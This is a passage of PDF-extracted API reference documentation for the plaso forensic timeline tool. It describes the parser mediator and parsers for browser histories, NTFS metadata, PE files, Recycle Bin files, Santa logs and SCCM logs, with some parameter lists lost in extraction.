Parameters plugin_or_parser (BaseParser) – parser or parser plugin.

ClearEventAttributes()Clears the extra event attributes.

ClearParserChain()Clears the parser chain.

GetCurrentYear()Retrieves current year.

Returns the current year.

Return type int

GetDisplayName(file_entry=None)Retrieves the display name for a file entry.

Parameters file_entry (Optional[dfvfs.FileEntry]) – file entry object, whereNone will return the display name of self._file_entry.

Returns human readable string that describes the path to the file entry.

Return type str

Raises ValueError – if the file entry is missing.




Return type str

GetEstimatedYear()Retrieves an estimate of the year.



This function determines the year in the following manner: * determine if the user provided a preferredyear; * determine if knowledge base defines a year derived from preprocessing; * determine the year basedon the file entry metadata; * default to the current year;

Returns estimated year.

Return type int

GetFileEntry()Retrieves the active file entry.

Returns file entry.

Return type dfvfs.FileEntry

GetFilename()Retrieves the name of the active file entry.

Returns name of the active file entry or None.

Return type str

GetLatestYear()Retrieves the latest (newest) year for an event from a file.

This function tries to determine the year based on the file entry metadata, if that fails the current year isused.

Returns year of the file entry or the current year.

Return type int

GetParserChain()Retrieves the current parser chain.

Returns parser chain.

Return type str

GetRelativePath()Retrieves the relative path of the current file entry.

Returns

relateive path of the current file entry or None if no current file entry.

Return type str

GetRelativePathForPathSpec(path_spec)Retrieves the relative path for a path specification.


Returns relateive path of the path specification.

Return type str

PopFromParserChain()Removes the last added parser or parser plugin from the parser chain.

ProcessEventData(event_data, parser_chain=None, file_entry=None, query=None)Processes event data before it written to the storage.

Parameters


• parser_chain (Optional[str]) – parsing chain up to this point.



• file_entry (Optional[dfvfs.FileEntry]) – file entry, where None will usethe current file entry set in the mediator.

• query (Optional[str]) – query that was used to obtain the event data.

Raises KeyError – if there’s an attempt to add a duplicate attribute value to the event data.

ProduceEventDataStream(event_data_stream)Produces an event data stream.

Parameters event_data_stream (EventDataStream) – an event data stream or Noneif no event data stream is needed.

Raises RuntimeError – when storage writer is not set.

ProduceEventSource(event_source)Produces an event source.

Parameters event_source (EventSource) – an event source.


ProduceEventWithEventData(event, event_data)Produces an event.

Parameters



Raises InvalidEvent – if the event timestamp value is not set or out of bounds or if the eventdata (attribute container) values cannot be hashed.

ProduceExtractionWarning(message, path_spec=None)Produces an extraction warning.

Parameters

• message (str) – message of the warning.

• path_spec (Optional[dfvfs.PathSpec]) – path specification, where None willuse the path specification of current file entry set in the mediator.


RemoveEventAttribute(attribute_name)Removes an attribute from being set on all events produced.

Parameters attribute_name (str) – name of the attribute to remove.

Raises KeyError – if the event attribute is not set.

ResetFileEntry()Resets the active file entry.

SampleMemoryUsage(parser_name)Takes a sample of the memory usage for profiling.


SampleStartTiming(parser_name)Starts timing a CPU time sample for profiling.




SampleStopTiming(parser_name)Stops timing a CPU time sample for profiling.


SetFileEntry(file_entry)Sets the active file entry.

Parameters file_entry (dfvfs.FileEntry) – file entry.

SetStorageWriter(storage_writer)Sets the storage writer.

Parameters storage_writer (StorageWriter) – storage writer.

SignalAbort()Signals the parsers to abort.

StartProfiling(configuration, identifier, process_information)Starts profiling.

Parameters

• configuration (ProfilingConfiguration) – profiling configuration.

• identifier (str) – identifier of the profiling session used to create the sample file-name.

• process_information (ProcessInfo) – process information.

StopProfiling()Stops profiling.

property abortTrue if parsing should be aborted.

Type bool

property codepagecodepage.

Type str

property hostnamehostname.

Type str

property knowledge_baseknowledge base.

Type KnowledgeBase

property number_of_produced_event_sourcesnumber of produced event sources.

Type int

property number_of_produced_eventsnumber of produced events.

Type int

property number_of_produced_warningsnumber of produced warnings.

Type int



property operating_systemoperating system or None if not set.

Type str

property resolver_contextresolver context.

Type dfvfs.Context

property temporary_directorypath of the directory for temporary files.

Type str

property timezonetimezone.

Type datetime.tzinfo

property yearyear.

Type int

plaso.parsers.msiecf module

Parser for Microsoft Internet Explorer (MSIE) Cache Files (CF).

class plaso.parsers.msiecf.MSIECFLeakEventDataBases: plaso.containers.events.EventData

MSIECF leak event data.


Type str


Type int

cache_directory_indexindex of the cache directory.

Type int

cache_directory_namename of the cache directory.

Type str

recoveredTrue if the item was recovered.

Type bool

DATA_TYPE = 'msiecf:leak'

class plaso.parsers.msiecf.MSIECFParserBases: plaso.parsers.interface.FileObjectParser

Parses MSIE Cache Files (MSIECF).



DATA_FORMAT = 'Microsoft Internet Explorer (MSIE) 4 - 9 cache (index.dat) file'




NAME = 'msiecf'

ParseFileObject(parser_mediator, file_object)Parses a MSIE Cache File (MSIECF) file-like object.

Parameters



class plaso.parsers.msiecf.MSIECFRedirectedEventDataBases: plaso.containers.events.EventData

MSIECF redirected event data.


Type bool

urllocation URL.

Type str

DATA_TYPE = 'msiecf:redirected'

class plaso.parsers.msiecf.MSIECFURLEventDataBases: plaso.containers.events.EventData

MSIECF URL event data.


Type str


Type int

cache_directory_indexindex of the cache directory.

Type int

cache_directory_namename of the cache directory.

Type str

http_headersHTTP headers.

Type str



number_of_hitsnumber of hits.

Type int


Type bool

urllocation URL.

Type str

DATA_TYPE = 'msiecf:url'

plaso.parsers.networkminer module

Parser for NetworkMiner .fileinfos files.

class plaso.parsers.networkminer.NetworkMinerEventDataBases: plaso.containers.events.EventData

NetworkMiner event Data.

destination_ipDestination IP address.

Type str

destination_portDestination port number.

Type str

file_detailsDetails about the file.

Type string

file_md5MD5 hash of the file.

Type string

file_pathFile path to where it was downloaded.

Type string

file_sizeSize of the file.

Type string

filenameName of the file.

Type string

source_ipOriginating IP address.

Type str



source_portOriginating port number.

Type str

DATA_TYPE = 'networkminer:fileinfos:file'

class plaso.parsers.networkminer.NetworkMinerParser(encoding=None)Bases: plaso.parsers.dsv_parser.DSVParser

Parser for NetworkMiner .fileinfos files.

COLUMNS = ('source_ip', 'source_port', 'destination_ip', 'destination_port', 'filename', 'file_path', 'file_size', 'unused', 'file_md5', 'unused2', 'file_details', 'unused4', 'timestamp')

DATA_FORMAT = 'NetworkMiner .fileinfos file'

MIN_COLUMNS = 13

NAME = 'networkminer_fileinfo'


Parameters





Parameters




Return type bool

plaso.parsers.ntfs module

Parser for NTFS metadata files.

class plaso.parsers.ntfs.NTFSFileStatEventDataBases: plaso.containers.events.EventData

NTFS file system stat event data.

attribute_typeattribute type for example “0x00000030”, which represents “$FILE_NAME”.

Type int

display_namedisplay name.

Type str



file_attribute_flagsNTFS file attribute flags.

Type int

file_referenceNTFS file reference.

Type int


Type str


Type str

is_allocatedTrue if the MFT entry is allocated (marked as in use).

Type bool

namename associated with the stat event, for example that of a $FILE_NAME attribute or None if not available.

Type str

parent_file_referenceNTFS file reference of the parent.

Type int

path_hintshints about the full path of the file.

Type list[str]

DATA_TYPE = 'fs:stat:ntfs'

class plaso.parsers.ntfs.NTFSMFTParserBases: plaso.parsers.interface.FileObjectParser

Parses a NTFS $MFT metadata file.

DATA_FORMAT = 'NTFS $MFT metadata file'




NAME = 'mft'

ParseFileObject(parser_mediator, file_object)Parses a NTFS $MFT metadata file-like object.

Parameters





class plaso.parsers.ntfs.NTFSUSNChangeEventDataBases: plaso.containers.events.EventData

NTFS USN change event data.

file_attribute_flagsNTFS file attribute flags.

Type int

filenamename of the file associated with the event.

Type str

file_referenceNTFS file reference.

Type int


Type str

parent_file_referenceNTFS file reference of the parent.

Type int

update_reason_flagsupdate reason flags.

Type int

update_sequence_numberupdate sequence number.

Type int

update_source_flagsupdate source flags.

Type int

DATA_TYPE = 'fs:ntfs:usn_change'

class plaso.parsers.ntfs.NTFSUsnJrnlParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parses a NTFS USN change journal.

DATA_FORMAT = 'NTFS USN change journal ($UsnJrnl:$J) file system metadata file'

NAME = 'usnjrnl'

ParseFileObject(parser_mediator, file_object)Parses a NTFS $UsnJrnl metadata file-like object.

Parameters





plaso.parsers.olecf module

Parser for OLE Compound Files (OLECF).

class plaso.parsers.olecf.OLECFParserBases: plaso.parsers.interface.FileObjectParser

Parses OLE Compound Files (OLECF).

DATA_FILE = 'OLE Compound file (OLECF)'




NAME = 'olecf'

ParseFileObject(parser_mediator, file_object)Parses an OLE Compound File (OLECF) file-like object.

Parameters



plaso.parsers.opera module

Parsers for Opera Browser history files.

class plaso.parsers.opera.OperaGlobalHistoryEventDataBases: plaso.containers.events.EventData

Opera global history entry data.


Type str

popularity_indexpopularity index.

Type int

titletitle.

Type str

urlURL.

Type str

DATA_TYPE = 'opera:history:entry'

class plaso.parsers.opera.OperaGlobalHistoryParserBases: plaso.parsers.interface.FileObjectParser

Parses the Opera global_history.dat file.



DATA_FORMAT = 'Opera global history (global_history.dat) file'

NAME = 'opera_global'

ParseFileObject(parser_mediator, file_object)Parses an Opera global history file-like object.

Parameters




class plaso.parsers.opera.OperaTypedHistoryEventDataBases: plaso.containers.events.EventData

Opera typed history entry data.

entry_selectioninformation about whether the URL was directly typed in or the result of the user choosing from the autocomplete.

Type str

entry_typeinformation about whether the URL was directly typed in or the result of the user choosing from the autocomplete.

Type str

urltyped URL or hostname.

Type str

DATA_TYPE = 'opera:history:typed_entry'

class plaso.parsers.opera.OperaTypedHistoryParserBases: plaso.parsers.interface.FileObjectParser

Parses the Opera typed_history.xml file.

DATA_FORMAT = 'Opera typed history (typed_history.xml) file'

NAME = 'opera_typed_history'

ParseFileObject(parser_mediator, file_object)Parses an Opera typed history file-like object.

Parameters






plaso.parsers.pe module

A parser for Portable Executable format files.

class plaso.parsers.pe.PEEventDataBases: plaso.containers.events.EventData

Portable Executable (PE) event data.

dll_namename of an imported DLL.

Type str

imphash“Import Hash” of the pe file the event relates to. Also see: https://www.mandiant.com/blog/tracking-malware-import-hashing

Type str

pe_typetype of PE file the event relates to.

Type str

section_namesnames of the PE file’s sections.

Type list[str]

DATA_TYPE = 'pe'

class plaso.parsers.pe.PEParserBases: plaso.parsers.interface.FileObjectParser

Parser for Portable Executable (PE) files.

DATA_FORMAT = 'Portable Executable (PE) file'


NAME = 'pe'

ParseFileObject(parser_mediator, file_object)Parses a Portable Executable (PE) file-like object.

Parameters





https://www.mandiant.com/blog/tracking-malware-import-hashing

https://www.mandiant.com/blog/tracking-malware-import-hashing


plaso.parsers.plist module

Parser for binary and text Property List (plist) files.

class plaso.parsers.plist.PlistParserBases: plaso.parsers.interface.FileObjectParser

Parser for binary and text Property List (plist) files.

The Plaso engine calls parsers by their Parse() method. This parser’s Parse() has GetTopLevel() which deseri-alizes plist files using the plistlib library and calls plugins (PlistPlugin) registered through the interface by theirProcess() to produce event objects.

Plugins are how this parser understands the content inside a plist file, each plugin holds logic specific to a partic-ular plist file. See the interface and plist_plugins/ directory for examples of how plist plugins are implemented.

DATA_FORMAT = 'Property list (plist) file'




GetTopLevel(file_object)Returns the deserialized content of a plist as a dictionary object.

Parameters file_object (dfvfs.FileIO) – a file-like object to parse.

Returns contents of the plist.



NAME = 'plist'

ParseFileObject(parser_mediator, file_object)Parses a plist file-like object.

Parameters




plaso.parsers.pls_recall module

Parser for PL/SQL Developer Recall files.

class plaso.parsers.pls_recall.PlsRecallEventDataBases: plaso.containers.events.EventData

PL/SQL Recall event data.

database_namename of the database.

Type str



queryPL/SQL query.

Type str

sequence_numbersequence number.

Type int

usernameusername used to query.

Type str

DATA_TYPE = 'PLSRecall:event'

class plaso.parsers.pls_recall.PlsRecallParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parse PL/SQL Recall files.

This parser is based on the Delphi definition of the data type:

TRecallRecord = packed record Sequence: Integer; TimeStamp: TDateTime; Username: ar-ray[0..30] of Char; Database: array[0..80] of Char; Text: array[0..4000] of Char;

end;

Delphi TDateTime is a little-endian 64-bit floating-point value without time zone information.

DATA_FORMATE = 'PL SQL cache file (PL-SQL developer recall file)'

NAME = 'pls_recall'

ParseFileObject(parser_mediator, file_object)Parses a PLSRecall.dat file-like object.

Parameters




plaso.parsers.plugins module

This file contains basic interface for plugins within Plaso.

This library serves a basis for all plugins in Plaso, whether that are Windows registry plugins, SQLite plugins or anyother parsing plugins.

This is provided as a separate file to make it easier to inherit in other projects that may want to use the Plaso pluginsystem.

class plaso.parsers.plugins.BasePluginBases: object

A plugin is a lightweight parser that makes use of a common data structure.

When a data structure is common among several artifacts or files a plugin infrastructure can be written to makewriting parsers simpler. The goal of a plugin is have only a single parser that understands the data structure thatcan call plugins that have specialized knowledge of certain structures.



An example of this is a SQLite database. A plugin can be written that has knowledge of certain database, suchas Chrome history, or Skype history, etc. This can be done without needing to write a full fledged parser thatneeds to re-implement the data structure knowledge. A single parser can be created that calls the plugins to seeif it knows that particular database.

Another example is Windows registry, there a single parser that can parse the registry can be made and the jobof a single plugin is to parse a particular registry key. The parser can then read a registry key and compare it toa list of available plugins to see if it can be parsed.

DATA_FORMAT = ''

NAME = 'base_plugin'

Process(parser_mediator, **kwargs)Evaluates if this is the correct plugin and processes data accordingly.

The purpose of the process function is to evaluate if this particular plugin is the correct one for the particulardata structure at hand. This function accepts one value to use for evaluation, that could be a registry key,list of table names for a database or any other criteria that can be used to evaluate if the plugin should berun or not.

Parameters


• kwargs (dict[str, object]) – Depending on the plugin they may require differentsets of arguments to be able to evaluate whether or not this is the correct plugin.

Raises ValueError – when there are unused keyword arguments.

URLS = []

UpdateChainAndProcess(parser_mediator, **kwargs)Wrapper for Process() to synchronize the parser chain.

This convenience method updates the parser chain object held by the mediator, transfers control to theplugin-specific Process() method, and updates the chain again once the processing is complete. It providesa simpler parser API in most cases.

Parameters parser_mediator (ParserMediator) – mediates interactions betweenparsers and other components, such as storage and dfvfs.

property plugin_nameReturn the name of the plugin.

class plaso.parsers.plugins.BasePluginCacheBases: object

A generic cache for parser plugins.

GetResults(attribute, default_value=None)Retrieves a cached attribute.

Parameters

• attribute (str) – name of the cached attribute.

• default_value (Optional[object]) – default value.

Returns

value of the cached attribute or default value if the cache does not contain the attribute.

Return type object



plaso.parsers.popcontest module

This file contains the Popularity Contest log file parser in plaso.

Information updated 20 january 2014. From Debian Package Popularity Contest Avery Pennarun <[email protected]>

From ‘http://www.unix.com/man-page/Linux/8/popularity-contest/’:

The popularity-contest command gathers information about Debian packages installed on the system,and prints the name of the most recently used executable program in that package as well as its last-accessed time (atime) and last-attribute-changed time (ctime) to stdout.

When aggregated with the output of popularity-contest from many other systems, this information isvaluable because it can be used to determine which Debian packages are commonly installed, used, orinstalled and never used. This helps Debian maintainers make decisions such as which packages shouldbe installed by default on new systems.

The resulting statistic is available from the project home page http://popcon.debian.org/.

Normally, popularity-contest is run from a cron(8) job, /etc/cron.daily/popularity-contest, which automat-ically submits the results to Debian package maintainers (only once a week) according to the settings in/etc/popularity-contest.conf and /usr/share/popularity- contest/default.conf.

From ‘http://popcon.ubuntu.com/README’:

The popularity-contest output looks like this:

POPULARITY-CONTEST-0 TIME:914183330 ID:b92a5fc1809d8a95a12eb3a3c8445914183333 909868335 grep /bin/fgrep 914183333 909868280 findutils /usr/bin/find914183330 909885698 dpkg-awk /usr/bin/dpkg-awk 914183330 909868577 gawk/usr/bin/gawk [. . . more lines. . . ] END-POPULARITY-CONTEST-0 TIME:914183335

The first and last lines allow you to put more than one set of popularity-contest results into asingle file and then split them up easily later.

The rest of the lines are package entries, one line for each package installed on your system.They have the format:

<atime> <ctime> <package-name> <mru-program> <tag>

<package-name> is the name of the Debian package that contains <mru-program>. <mru-program> is the most recently used program, static library, or header (.h) file in the package.

<atime> and <ctime> are the access time and creation time of the <mru-program> on yourdisk, respectively, represented as the number of seconds since midnight GMT on January 1,1970 (i.e. in Unix time_t format). Linux updates <atime> whenever you open the file; <ctime>was set when you first installed the package.

<tag> is determined by popularity-contest depending on <atime>, <ctime>, and the currentdate. <tag> can be RECENT-CTIME, OLD, or NOFILES.

RECENT-CTIME means that atime is very close to ctime; it’s impossible to tell whether thepackage was used recently or not, since <atime> is also updated when <ctime> is set. Nor-mally, this happens because you have recently upgraded the package to a new version, resettingthe <ctime>.

OLD means that the <atime> is more than a month ago; you haven’t used the package for morethan a month.

NOFILES means that no files in the package seemed to be programs, so <atime>, <ctime>,and <mru-program> are invalid.’


mailto:[email protected]

mailto:[email protected]

http://www.unix.com/man-page/Linux/8/popularity-contest/

http://popcon.debian.org/

http://popcon.ubuntu.com/README


REMARKS. The parser will generate events solely based on the <atime> field and not using <ctime>, toreduce the generation of (possibly many) useless events all with the same <ctime>. Indeed, that <ctime>will be probably get from file system and/or package management logs. The <ctime> will be reported inthe log line.

class plaso.parsers.popcontest.PopularityContestEventDataBases: plaso.containers.events.EventData

Popularity Contest event data.

mrurecently used app/library from package.

Type str

packageinstalled packaged name, which the mru belongs to.

Type str

record_tagpopularity context tag.

Type str

DATA_TYPE = 'popularity_contest:log:event'

class plaso.parsers.popcontest.PopularityContestParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parse popularity contest log files.

DATA_FORMAT = 'Popularity Contest log file'

FOOTER = {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)}

HEADER = {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)}

LINE_STRUCTURES = [('logline', {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}}), ('header', {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)}), ('footer', {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)})]

LOG_LINE = {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}}

MRU = W:(...)

NAME = 'popularity_contest'

PACKAGE = W:(0123...)


Parameters





TAG = quoted string, starting with < ending with >

VerifyStructure(parser_mediator, line)Verify that this file is a Popularity Contest log file.

Parameters






Return type bool

class plaso.parsers.popcontest.PopularityContestSessionEventDataBases: plaso.containers.events.EventData

Popularity Contest session event data.

detailsversion and host architecture.

Type str

hostidhost uuid.

Type str

sessionsession number.

Type int

statussession status, either “start” or “end”.

Type str

DATA_TYPE = 'popularity_contest:session:event'

plaso.parsers.presets module

The parser and parser plugin presets.

class plaso.parsers.presets.ParserPreset(name, parsers)Bases: object

Parser and parser plugin preset.

namename of the preset.

Type str

operating_systemsoperating system artifact attribute containers, that specify to which operating systems the preset applies.

Type list[OperatingSystemArtifact]

parsersnames of parser and parser plugins.

Type list[str]

class plaso.parsers.presets.ParserPresetsManagerBases: object

The parsers and plugin presets manager.



GetNames()Retrieves the preset names.

Returns preset names in alphabetical order.


GetParsersByPreset(preset_name)Retrieves the parser and plugin names of a specific preset.

Parameters preset_name (str) – name of the preset.

Returns parser and plugin names in alphabetical order.


Raises KeyError – if the preset does not exist.

GetPresetByName(name)Retrieves a specific preset definition by name.

Parameters name (str) – name of the preset.

Returns a parser preset or None if not available.

Return type ParserPreset

GetPresetsByOperatingSystem(operating_system)Retrieves preset definitions for a specific operating system.

Parameters operating_system (OperatingSystemArtifact) – an operating systemartifact attribute container.

Returns

preset definition that correspond with the operating system.

Return type list[PresetDefinition]

GetPresetsInformation()Retrieves the presets information.

Returns

containing:

str: preset name. str: comma separated parser and plugin names that are defined by

the preset.


ReadFromFile(path)Reads parser and parser plugin presets from a file.

Parameters path (str) – path of file that contains the the parser and parser plugin presetsconfiguration.

Raises MalformedPresetError – if one or more plugin preset definitions are malformed.



plaso.parsers.recycler module

Parser for Windows Recycle files, INFO2 and $I/$R pairs.

class plaso.parsers.recycler.WinRecycleBinEventDataBases: plaso.containers.events.EventData

Windows Recycle Bin event data.

drive_numberdrive number.

Type int

file_sizefile size.

Type int

original_filenamefilename.

Type str

record_indexindex of the record on which the event is based.

Type int

short_filenameshort filename.

Type str

DATA_TYPE = 'windows:metadata:deleted_item'

class plaso.parsers.recycler.WinRecycleBinParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parses the Windows $Recycle.Bin $I files.

DATA_FORMAT = 'Windows $Recycle.Bin $I file'

NAME = 'recycle_bin'

ParseFileObject(parser_mediator, file_object)Parses a Windows Recycle.Bin metadata ($I) file-like object.

Parameters




class plaso.parsers.recycler.WinRecyclerInfo2ParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parses the Windows Recycler INFO2 file.

DATA_FORMAT = 'Windows Recycler INFO2 file'

NAME = 'recycle_bin_info2'



ParseFileObject(parser_mediator, file_object)Parses a Windows Recycler INFO2 file-like object.

Parameters




plaso.parsers.safari_cookies module

Parser for Safari Binary Cookie files.

class plaso.parsers.safari_cookies.BinaryCookieParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for Safari Binary Cookie files.

DATA_FORMAT = 'Safari Binary Cookie file'

classmethod GetFormatSpecification()Retrieves the format specification for parser selection.



NAME = 'binary_cookies'

ParseFileObject(parser_mediator, file_object)Parses a Safari binary cookie file-like object.

Parameters


• file_object (dfvfs.FileIO) – file-like object to be parsed.

Raises

• ParseError – when the page sizes array cannot be parsed.

• UnableToParseFile – when the file cannot be parsed, this will signal the event ex-tractor to apply other parsers.

class plaso.parsers.safari_cookies.SafariBinaryCookieEventDataBases: plaso.containers.events.EventData

Safari binary cookie event data.

cookie_namecookie name.

Type str

cookie_valuecookie value.

Type str

flagscookie flags.



Type int

pathpath of the cookie.

Type str

urlURL where this cookie is valid.

Type str

DATA_TYPE = 'safari:cookie:entry'

plaso.parsers.santa module

Santa log (santa.log) parser.

class plaso.parsers.santa.SantaExecutionEventDataBases: plaso.containers.events.EventData

Santa execution event data.

actionaction recorded by Santa.

Type str

decisionif the process was allowed or blocked.

Type str

reasonreason behind santa decision to execute or block a process.

Type str

process_hashSHA256 hash for the executed process.

Type str

certificate_hashSHA256 hash for the certificate associated with the executed process.

Type str

certificate_common_namecertificate common name.

Type str

pidprocess id for the process.

Type str

ppidparent process id for the executed process.

Type str

uiduser id associated with the executed process.



Type str

useruser name associated with the executed process.

Type str

gidgroup id associated with the executed process.

Type str

groupgroup name associated with the executed process.

Type str

modeSanta execution mode, for example Monitor or Lockdown.

Type str

process_pathprocess file path.

Type str

process_argumentsexecuted process with its arguments.

Type str

DATA_TYPE = 'santa:execution'

class plaso.parsers.santa.SantaFileSystemEventDataBases: plaso.containers.events.EventData

Santa file system event data.

actionevent type recorded by Santa.

Type str

file_pathfile path and name for WRITE/DELETE events.

Type str

file_new_pathnew file path and name for RENAME events.

Type str

pidprocess id for the process.

Type str

ppidparent process id for the executed process.

Type str

processprocess name.



Type str

process_pathprocess file path.

Type str

uiduser id associated with the executed process.

Type str

useruser name associated with the executed process.

Type str

gidgroup id associated with the executed process.

Type str

groupgroup name associated with the executed process.

Type str

DATA_TYPE = 'santa:file_system_event'

class plaso.parsers.santa.SantaMountEventDataBases: plaso.containers.events.EventData

Santa mount event data.

actionevent type recorded by Santa.

Type str

mountdisk mount point.

Type str

volumedisk volume name.

Type str

bsd_namedisk BSD name.

Type str

fsdisk volume kind.

Type str

modeldisk model.

Type str

serialdisk serial.



Type str

busdevice protocol.

Type str

dmg_pathDMG file path.

Type str

appearancedisk appearance date.

Type str

DATA_TYPE = 'santa:diskmount'

class plaso.parsers.santa.SantaParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses santa log files

DATA_FORMAT = 'Santa log (santa.log) file'

LINE_STRUCTURES = [('execution_line', {{{{{{{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "EXEC"} Suppress:("|")} {{Suppress:("decision=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("reason=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("sha256=") SkipTo:("|")} Suppress:("|")}} [{{Suppress:("cert_sha256=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("cert_cn=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("quarantine_url=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("mode=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{Suppress:("args=") SkipTo:(lineEnd)}]}), ('file_system_event_line', {{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} {{"WRITE" ^ "RENAME"} ^ "DELETE"}} Suppress:("|")} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{{Suppress:("newpath=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("process=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("processpath=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('mount_line', {{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("fs=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("model=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("serial=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bus=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("dmgpath=") SkipTo:("|")} Suppress:("|")}} {Suppress:("appearance=") SkipTo:(lineEnd)}}), ('umount_line', {{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKDISAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('quota_exceeded_line', {Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) "*** LOG MESSAGE QUOTA EXCEEDED - SOME MESSAGES FROM THIS PROCESS HAVE BEEN DISCARDED ***"})]


NAME = 'santa'


Parameters





VerifyStructure(parser_mediator, line)Verifies that this is a santa log file.

Parameters


• line (str) – line from the text file.


Return type bool



plaso.parsers.sccm module

Parser for SCCM Logs.

class plaso.parsers.sccm.SCCMLogEventDataBases: plaso.containers.events.EventData

SCCM log event data.

componentcomponent.

Type str

texttext.

Type str

DATA_TYPE = 'software_management:sccm:log'

class plaso.parsers.sccm.SCCMParserBases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

Parser for Windows System Center Configuration Manager (SCCM) logs.

BUFFER_SIZE = 16384

DATA_FORMAT = 'System Center Configuration Manager (SCCM) client log file'

LINE_GRAMMAR_BASE = {{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)}

LINE_GRAMMAR_OFFSET = {{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} Re:('[-+]\\d{2,3}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)}

